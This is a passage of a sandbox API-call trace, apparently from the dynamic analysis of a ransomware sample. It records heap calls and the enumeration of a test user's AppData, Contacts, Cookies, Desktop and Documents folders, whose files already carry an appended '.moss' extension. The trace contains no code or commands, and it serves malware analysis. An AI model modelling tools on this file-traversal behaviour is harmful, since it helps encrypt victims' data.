lpMem=0x3a5c1d8 | out: hHeap=0x2c0000) returned 1 [0173.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c1d8 [0173.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c1d8 | out: hHeap=0x2c0000) returned 1 [0173.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c1d8 [0173.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c1d8 | out: hHeap=0x2c0000) returned 1 [0173.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c1d8 [0173.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c1d8 | out: hHeap=0x2c0000) returned 1 [0173.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c1d8 [0173.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c1d8 | out: hHeap=0x2c0000) returned 1 [0173.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c1d8 [0173.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c1d8 | out: hHeap=0x2c0000) returned 1 [0173.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c1d8 [0173.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c1d8 | out: hHeap=0x2c0000) returned 1 [0173.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c1d8 [0173.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c1d8 | out: hHeap=0x2c0000) returned 1 [0173.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c1d8 [0173.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c1d8 | out: hHeap=0x2c0000) returned 1 [0173.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c1d8 [0173.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c1d8 | out: hHeap=0x2c0000) returned 1 [0173.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c1d8 [0173.889] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0173.889] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.889] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59880 | out: hHeap=0x2c0000) returned 1 [0173.889] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.889] PathFindFileNameW (pszPath="") returned="" [0173.889] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c1d8 | out: hHeap=0x2c0000) returned 1 [0173.890] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.890] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1777ff60, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1777ff60, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0173.890] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5cc28 | out: hHeap=0x2c0000) returned 1 [0173.890] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.890] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned="Application Data\\" [0173.890] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.890] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59880 | out: hHeap=0x2c0000) returned 1 [0173.890] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.890] PathFindFileNameW (pszPath="") returned="" [0173.890] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdfdb3fc0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdfdb3fc0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0xffffffff [0173.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x353fef8 | out: hHeap=0x2c0000) returned 1 [0173.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9fea8 | out: hHeap=0x2c0000) returned 1 [0173.891] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.891] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="Contacts\\" [0173.891] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.891] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59880 | out: hHeap=0x2c0000) returned 1 [0173.891] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.891] PathFindFileNameW (pszPath="") returned="" [0173.891] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1b8a99a0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1b8a99a0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9fea8 | out: hHeap=0x2c0000) returned 1 [0173.891] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1b8a99a0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1b8a99a0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.891] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x1b72cbe0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x5e8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact.moss", cAlternateFileName="ACLVIH~1.MOS")) returned 1 [0173.891] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1b752d40, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x10c6c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrator.contact.moss", cAlternateFileName="ADMINI~1.MOS")) returned 1 [0173.891] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x1b778ea0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x5e1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="asdlfk poopvy.contact.moss", cAlternateFileName="ASDLFK~1.MOS")) returned 1 [0173.891] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x1b7c5160, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x5e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chucu jadnvk.contact.moss", cAlternateFileName="CHUCUJ~1.MOS")) returned 1 [0173.891] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0173.891] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x1b811420, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x5e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lulcit amkdfe.contact.moss", cAlternateFileName="LULCIT~1.MOS")) returned 1 [0173.891] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x1b8a99a0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x5e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact.moss", cAlternateFileName="SIKVNB~1.MOS")) returned 1 [0173.891] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x1b8a99a0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x5e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact.moss", cAlternateFileName="SIKVNB~1.MOS")) returned 0 [0173.891] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5cc28 | out: hHeap=0x2c0000) returned 1 [0173.892] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.892] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="Cookies\\" [0173.892] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.892] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59880 | out: hHeap=0x2c0000) returned 1 [0173.892] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.892] PathFindFileNameW (pszPath="") returned="" [0173.892] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x1b8a99a0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x5e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact.moss", cAlternateFileName="SIKVNB~1.MOS")) returned 0xffffffff [0173.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c1d8 | out: hHeap=0x2c0000) returned 1 [0173.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5cc28 | out: hHeap=0x2c0000) returned 1 [0173.892] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.892] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0173.892] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.892] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59880 | out: hHeap=0x2c0000) returned 1 [0173.893] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.893] PathFindFileNameW (pszPath="") returned="" [0173.893] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1bdde9c0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1bdde9c0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c1d8 | out: hHeap=0x2c0000) returned 1 [0173.893] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1bdde9c0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1bdde9c0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.893] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8466a20, ftCreationTime.dwHighDateTime=0x1d5e0bf, ftLastAccessTime.dwLowDateTime=0xeef9aa10, ftLastAccessTime.dwHighDateTime=0x1d5dcad, ftLastWriteTime.dwLowDateTime=0x1b8f5c60, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x16719, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5DnktQKC1zi5mnZO.mkv.moss", cAlternateFileName="5DNKTQ~1.MOS")) returned 1 [0173.893] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe986430, ftCreationTime.dwHighDateTime=0x1d5dc20, ftLastAccessTime.dwLowDateTime=0x1c3f8220, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1c3f8220, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5RddQRlUxLC956", cAlternateFileName="5RDDQR~1")) returned 1 [0173.893] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5cc28 | out: hHeap=0x2c0000) returned 1 [0173.893] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.893] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0173.893] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.893] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59880 | out: hHeap=0x2c0000) returned 1 [0173.893] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.893] PathFindFileNameW (pszPath="") returned="" [0173.893] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1c196c20, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1c196c20, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9fdd8 | out: hHeap=0x2c0000) returned 1 [0173.894] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1c196c20, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1c196c20, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.894] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3645bc00, ftCreationTime.dwHighDateTime=0x1d5dc28, ftLastAccessTime.dwLowDateTime=0xe4d16f0, ftLastAccessTime.dwHighDateTime=0x1d57e34, ftLastWriteTime.dwLowDateTime=0x1be2ac80, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x16eb5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0ekjNGhL.xlsx.moss", cAlternateFileName="0EKJNG~1.MOS")) returned 1 [0173.894] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16db0660, ftCreationTime.dwHighDateTime=0x1d5d825, ftLastAccessTime.dwLowDateTime=0x6505fbe0, ftLastAccessTime.dwHighDateTime=0x1d5d872, ftLastWriteTime.dwLowDateTime=0x1be50de0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x848d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0f4pt.pptx.moss", cAlternateFileName="0F4PTP~1.MOS")) returned 1 [0173.894] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb216a280, ftCreationTime.dwHighDateTime=0x1d55f83, ftLastAccessTime.dwLowDateTime=0xdff84fb0, ftLastAccessTime.dwHighDateTime=0x1d5e2b8, ftLastWriteTime.dwLowDateTime=0x1be76f40, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x20f7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6kq1Q5gxebf0czzCUr2.docx.moss", cAlternateFileName="6KQ1Q5~1.MOS")) returned 1 [0173.894] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58153d60, ftCreationTime.dwHighDateTime=0x1d5e5a1, ftLastAccessTime.dwLowDateTime=0x98ecf4f0, ftLastAccessTime.dwHighDateTime=0x1d5e1f9, ftLastWriteTime.dwLowDateTime=0x1be76f40, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x10a5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8eUHyn88AeSWE.odp.moss", cAlternateFileName="8EUHYN~1.MOS")) returned 1 [0173.894] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91e33d20, ftCreationTime.dwHighDateTime=0x1d58eae, ftLastAccessTime.dwLowDateTime=0x57778dd0, ftLastAccessTime.dwHighDateTime=0x1d5bcd0, ftLastWriteTime.dwLowDateTime=0x1be9d0a0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0xc170, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BhlJGzYb5rmhnwh9Mo.docx.moss", cAlternateFileName="BHLJGZ~1.MOS")) returned 1 